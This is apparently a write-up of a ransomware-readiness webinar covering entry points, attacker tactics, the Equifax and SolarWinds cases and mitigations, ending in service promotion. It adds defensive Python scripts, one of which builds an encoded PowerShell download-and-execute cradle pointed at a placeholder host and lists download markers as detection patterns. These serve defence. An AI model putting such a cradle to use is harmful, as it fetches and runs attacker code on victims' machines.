This Cybersecurity Insider episode discusses ransomware readiness. The episode features a webinar collaboration between Abrahams Consulting and 2Secure.
Yigal presents the webinar, which spotlights the growing threat of ransomware with attacks increasing by 15% annually.
Ransomware – What’s That?
Yigal starts by putting the slides into motion. Before discussing ransomware in detail, it’s important to define the term.
Yigal explains that ransomware is a type of malicious software, or malware, that infects computers, smartphones, and tablets. Once it’s on a device, it tries to hide itself to avoid detection.
He then describes how ransomware spreads to other computers within a network, increasing its impact. It then encrypts data, making it inaccessible to the user. The attackers then demand a ransom, usually in bitcoins, in exchange for the decryption key.
Yigal says that even if you have backups, it’s not always enough to recover from a ransomware attack. This is because some ransomware can also encrypt backups. Additionally, he warns that if you don’t pay the ransom, the attackers may release your data online, further damaging your reputation and potentially leading to financial losses.
He also points out that ransomware is designed to be persistent. Even if you try to remove it, it can still linger on your network. The only way to completely get rid of it is to reinstall everything from scratch, which is a time-consuming and costly process.
Ransomware – Common Entry Points
Yigal continues his story by diving into the common entry points for ransomware. He paints a picture of how easily these attacks can happen and how they compromise your web application security.
He begins with email, the most common entry point. He explains that ransomware can be hidden in links or attachments. When you click a malicious link, it downloads a small piece of code that either downloads the rest of the ransomware or runs directly on your computer. Attachments, often disguised as PDFs or Office documents, can also contain the ransomware payload.
Next, Yigal talks about RDP (Remote Desktop Protocol). He explains that RDP is used to connect remotely to servers, but it can also be a vulnerability if misconfigured. In his experience, open RDP ports are one of the most common findings in firewall reviews, leaving systems exposed to attack.
Web browsing is another way ransomware can get in. Some websites are already compromised, and when you visit them, malicious code can be downloaded and run on your computer without your knowledge. One example Yigal gives is cryptocurrency mining, where your computer’s resources are used to mine bitcoins for the attacker.
Social media and messenger apps are also potential entry points. Malicious links can be sent through messages, and clicking on them can lead to infection. Yigal points out that even desktop versions of messenger apps can be vulnerable.
To illustrate his point, Yigal shows an example of a ransomware email disguised as a FedEx package notification. He stresses the importance of training users to identify these types of attacks, paying close attention to details like the sender’s email address and the nature of the attachment.
Yigal also shows what happens when you open the attachment in the example email. It reveals an encoded JavaScript file, which, when run, would download the rest of the ransomware payload from the attacker’s site, beginning the infection process.
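As an added example (not from the webinar or 2Secure), here is a small Python attachment screen in the spirit of that FedEx example: it flags script extensions and "document.pdf.js" double extensions, and opens zip attachments to screen their members. The filenames and the zip are constructed for the demonstration, and the extension lists are an assumption rather than a complete policy.

```python
import io
import zipfile
import posixpath

# Illustrative extension lists (an assumption for this example, not an exhaustive policy).
# Script and executable types should not arrive by mail from an unknown sender.
SCRIPT_EXTENSIONS = {"js", "jse", "vbs", "wsf", "hta", "exe", "scr", "bat", "cmd", "ps1"}
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx"}

def classify_filename(name):
    """Return the reasons a filename looks risky (empty list means nothing flagged)."""
    reasons = []
    parts = posixpath.basename(name).lower().split(".")
    if len(parts) < 2:
        return reasons
    ext = parts[-1]
    if ext in SCRIPT_EXTENSIONS:
        reasons.append(f"script/executable extension .{ext}")
    # "FedEx_Notice.pdf.js" style: a document-looking extension hiding a script
    if len(parts) >= 3 and parts[-2] in DOCUMENT_EXTENSIONS and ext in SCRIPT_EXTENSIONS:
        reasons.append("double extension disguising a script as a document")
    return reasons

def screen_attachment(name, data):
    """Screen one attachment; zip archives are opened and each member is screened too."""
    findings = [(name, r) for r in classify_filename(name)]
    if name.lower().endswith(".zip"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for member in zf.namelist():
                    findings += [(f"{name}:{member}", r) for r in classify_filename(member)]
        except zipfile.BadZipFile:
            findings.append((name, "claims to be a zip archive but is not parseable"))
    return findings

def build_sample_zip():
    """Constructed sample: a zip holding a script named to look like a FedEx PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("FedEx_Delivery_Notice.pdf.js", "// placeholder content, not real malware\n")
    return buf.getvalue()

if __name__ == "__main__":
    for flagged_name, reason in screen_attachment("FedEx_Delivery_Notice.zip", build_sample_zip()):
        print(f"BLOCK {flagged_name}: {reason}")
```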
Threats Landscape
Yigal continues his discussion by revealing the tactics attackers are using to infiltrate systems and evade detection.
He begins by explaining a technique called “living off the land.” Attackers exploit legitimate tools like PowerShell and PsExec, which are commonly used by administrators to manage Windows environments. By using these familiar tools, hackers can blend in and avoid raising alarms, making their presence harder to detect.
Next, Yigal talks about the combination of automated compromise followed by human-led farming. He uses the SolarWinds attack as an example, where an automated intrusion paved the way for hackers to manually navigate and exploit the compromised system further. This two-pronged approach demonstrates the sophistication and persistence of modern ransomware attacks.
Backup encryption is another concerning tactic. Ransomware not only targets active data but also seeks to encrypt backups, leaving victims with limited recovery options. This reinforces the importance of having secure and isolated backups that are inaccessible to attackers.
Yigal addresses the exploitation of third-party vendors and the supply chain. He references the SolarWinds and Target breaches, where attackers compromised systems through vulnerabilities in third-party providers. These incidents show how connected our systems are and how a single vulnerability can put everything at risk.
Defender’s Challenge
Yigal transitions into discussing the alarming trends in ransomware attacks and the need for a new approach to combat this insidious threat.
The 15% average annual increase in ransomware attacks over the past few years poses a formidable challenge for defenders, requiring them to reassess and adapt their security strategies.
Yigal recommends implementing a multi-layered defense mechanism. While traditional antivirus solutions are still necessary, he points out their limitations, especially against zero-day attacks that lack known signatures.
He advocates for focusing on discovering unknown threats, highlighting the need for advanced detection capabilities that go beyond signature-based methods. This involves monitoring for unusual behavior or actions that could indicate a potential attack.
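The “living off the land” tactic described earlier and the behaviour monitoring Yigal calls for here can be turned into concrete detection logic. This added Python example (not the webinar’s or 2Secure’s code) checks constructed process-creation events for PowerShell launched by an Office application, encoded or download-and-execute PowerShell commands, and PsExec use; the event layout, the sample events and the marker lists are assumptions made for the example.

```python
import base64
import re
OFFICE_PARENTS = ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")
DOWNLOAD_MARKERS = ("net.webclient", "downloadstring", "downloadfile", "invoke-expression", "iex ")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), None if the
    command line has none, or '<undecodable>' if the blob is malformed."""
    m = re.search(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"

def analyse_event(image, cmdline, parent):
    """Return the detection reasons for one process-creation event (empty = nothing odd)."""
    reasons = []
    exe = image.rsplit("\\", 1)[-1].lower()
    parent_exe = parent.rsplit("\\", 1)[-1].lower()
    if exe in SCRIPT_HOSTS and parent_exe in OFFICE_PARENTS:
        reasons.append(f"{exe} spawned by Office application {parent_exe}")
    if exe in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            reasons.append("encoded PowerShell command")
        # Inspect the decoded text where there is one, otherwise the raw command line.
        if any(marker in (decoded or cmdline).lower() for marker in DOWNLOAD_MARKERS):
            reasons.append("download-and-execute pattern in PowerShell command")
    if exe in ("psexec.exe", "psexec64.exe", "psexesvc.exe"):
        reasons.append("PsExec remote execution tool")
    return reasons

def build_sample_events():
    """Constructed sample events as (image, command line, parent image); not real telemetry."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
    enc = base64.b64encode(cradle.encode("utf-16-le")).decode("ascii")
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    return [
        (ps, "powershell.exe -NoProfile -w hidden -enc " + enc,
         r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
        (ps, "powershell.exe Get-Service -Name Spooler", r"C:\Windows\explorer.exe"),
        (r"C:\Tools\PsExec.exe", r"PsExec.exe \\fileserver01 -s cmd.exe", r"C:\Windows\System32\cmd.exe"),
    ]

if __name__ == "__main__":
    for image, cmdline, parent in build_sample_events():
        print(image.rsplit("\\", 1)[-1], analyse_event(image, cmdline, parent))
```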
Yigal mentions a service called “threat hunting,” which can help organizations proactively identify and address emerging threats. He also stresses the importance of swift remediation of incidents, aligning with recommendations from the FBI (Federal Bureau of Investigation) and CISA (Cybersecurity and Infrastructure Security Agency).
He suggests having an incident response plan in place and offers assistance in developing or testing these plans to ensure organizations are well-prepared to respond effectively to ransomware incidents.
Case Study: Equifax
Yigal uses the Equifax case to show how a simple oversight can have huge consequences. Equifax failed to install a security update, and hackers got in and stole data for months. This shows how important it is to keep systems up-to-date and to be able to detect threats quickly.
Equifax only found out about the problem much later, and by then the damage was done. The company’s leaders had to quit, their stock price dropped, and their reputation was badly hurt. This story shows how important it is to be proactive about security and not wait until it’s too late.
Case Study: SolarWinds
Yigal also uses the SolarWinds attack to show how patient and resourceful ransomware attackers can be. They were able to stay hidden in SolarWinds’ systems for over a year, planning their attack.
A simple mistake, like using a weak password, gave them a way in. This attack affected not just SolarWinds, but also many other companies and even government agencies. It shows that even security companies can be hacked.
This leads Yigal to question whether traditional security tools are enough, since they don’t always find every threat. He finishes by saying that the most important thing is to find attacks early and stop them before they do too much damage.
Common Discovery Methods & Mitigations
Yigal then dives into the strategies used to discover threats and vulnerabilities in systems. He talks about penetration testing, vulnerability assessments, and phishing campaigns as common methods.
He points out that while these methods are useful, they might not be enough. They may not show all the weaknesses in a system, or how well a company can handle an attack if it happens.
Yigal then shifts to discussing common mitigation strategies recommended by the FBI and CISA. These include:
- Backups: He encourages having a regular backup and recovery plan and separating them from the main network to prevent ransomware from encrypting them.
- Updates: Yigal stresses the need for a robust patch management system and process to ensure all systems are updated regularly. This helps address known vulnerabilities before they can be exploited.
- Security Solutions: While acknowledging the importance of antivirus and anti-malware solutions, he points out their limitations, particularly against zero-day attacks. He suggests complementing these solutions with threat hunting services to address those gaps.
- Incident Response Plan: Yigal highlights the necessity of having a well-defined incident response plan that outlines the steps to take in case of a ransomware attack.
- Ransomware Defense: He recommends learning from past ransomware events to reduce exposure to risks. By understanding how previous attacks unfolded, organizations can better prepare themselves for future threats.
Yigal’s main point is that to truly protect against ransomware, you need multiple layers of defense. It’s not enough to just rely on antivirus software or firewalls. You also need to actively look for threats and be ready to respond quickly if something is found.
Ransomware – Army Style
Yigal shifts the focus to his unique approach to ransomware preparedness, drawing inspiration from his military background. He likens preparing for a ransomware attack to military training, emphasizing the importance of constant drills and live simulations.
He explains that just as soldiers train with live ammunition to understand the real consequences of their actions, cybersecurity teams need to practice responding to simulated ransomware attacks. This hands-on experience allows them to familiarize themselves with the tools, procedures, and potential challenges they might face in a real attack, making them better prepared to react effectively when it matters.
Yigal stresses that knowing about the latest threats is important. By staying informed, companies can find and fix problems before they get attacked. He shares a story of how he warned a client about a known threat, which helped them protect themselves.
He says cybersecurity teams can learn from the military. Just as soldiers study past battles, cybersecurity teams should study past ransomware attacks to understand how attackers work (their tactics, techniques, and procedures, or TTPs).
This helps them predict and stop future attacks. He also says that it’s important to be very observant and notice any unusual activity, as this could be a sign of an attack. He compares this to soldiers on the battlefield who must always be alert to their surroundings to detect potential threats.
Malware Attack Simulation – Army Style
Yigal prefers a practical approach to ransomware testing, focusing on realistic scenarios and finding the biggest weaknesses instead of just making a long list of every possible problem.
He describes his approach as “army style,” drawing parallels to his military experience serving in the Israeli Navy for three years. The goal is not to create a laundry list of findings but to pinpoint the specific areas where organizations are most vulnerable to ransomware attacks.
Pitfalls
Yigal points out that traditional security testing often focuses on finding all possible vulnerabilities, which can result in a long list of issues without prioritizing the most important ones.
He believes that many companies focus on meeting compliance-based standards rather than finding the biggest security risks. Instead, his company takes a more focused approach, looking for the weaknesses that attackers are most likely to use.
Yigal says his company’s goal isn’t to find every single problem but to find the most important ones and fix them. He mentions that clients often limit what his company can test, making it harder to find all the vulnerabilities.
He says firewalls are important but points out that misconfigurations are common, such as leaving RDP open to the public. While upgrading to next-generation firewalls can be helpful, Yigal argues that it’s not a complete solution, especially in the current remote work environment where data is often created and accessed on endpoints like laptops and desktops. “So really replacing firewalls [sic] won’t help you. The problem is where the data is being used, being read, being created, meaning on the endpoint on the desktop or the laptop or whatever you use,” he states.
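As an added example (not the webinar’s own material), here is a Python check for the open-RDP misconfiguration Yigal describes finding in firewall reviews: it walks a constructed rule base and lists the allow rules that admit TCP/3389 from outside the internal address ranges. The rule format, the internal-range list and the sample rules are assumptions made for the demonstration.

```python
import ipaddress

RDP_PORT = 3389
# Address space treated as internal for this review (RFC 1918 plus loopback); an assumption for the example.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def port_matches(spec, port):
    """True if a port spec ('any', '3389' or a range like '3300-3400') covers the port."""
    spec = spec.strip().lower()
    if spec == "any":
        return True
    if "-" in spec:
        lo, hi = (int(x) for x in spec.split("-", 1))
        return lo <= port <= hi
    return int(spec) == port

def source_is_public(spec):
    """True if the source spec ('any' or an IPv4 CIDR) reaches beyond the internal ranges."""
    spec = spec.strip().lower()
    if spec == "any":
        return True
    net = ipaddress.ip_network(spec, strict=False)
    return not any(net.subnet_of(internal) for internal in INTERNAL_NETS)

def find_exposed_rdp(rules):
    """Names of allow rules that admit TCP/3389 from a public source.
    Rules are checked independently; first-match ordering (an earlier deny) is not modelled."""
    exposed = []
    for rule in rules:
        if rule["action"].lower() != "allow" or rule["proto"].lower() not in ("tcp", "any"):
            continue
        if port_matches(rule["dst_port"], RDP_PORT) and source_is_public(rule["src"]):
            exposed.append(rule["name"])
    return exposed

# Constructed sample rule base for the example; not taken from any real firewall.
SAMPLE_RULES = [
    {"name": "allow-rdp-from-vpn", "action": "allow", "proto": "tcp", "src": "10.20.0.0/16", "dst_port": "3389"},
    {"name": "allow-rdp-any", "action": "allow", "proto": "tcp", "src": "any", "dst_port": "3389"},
    {"name": "allow-mgmt-range", "action": "allow", "proto": "any", "src": "203.0.113.0/24", "dst_port": "3300-3400"},
    {"name": "deny-rdp", "action": "deny", "proto": "tcp", "src": "any", "dst_port": "3389"},
    {"name": "allow-https", "action": "allow", "proto": "tcp", "src": "any", "dst_port": "443"},
]

if __name__ == "__main__":
    print("Rules exposing RDP to public sources:", find_exposed_rdp(SAMPLE_RULES))
```

The same walk applies to any other management service that should never be reachable from the internet; only the port constant changes.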
If you’re ready to strengthen your cybersecurity defenses with an “army-style” approach, 2Secure Corp offers comprehensive cybersecurity consulting services for managed defense, threat discovery, and swift remediation. Schedule a consultation today. For more of our informative webinars and engaging podcast episodes, catch them on YouTube, Apple Podcasts, or Spotify. Get expert insights, practical advice, and real-world stories to improve your cyber resilience. Subscri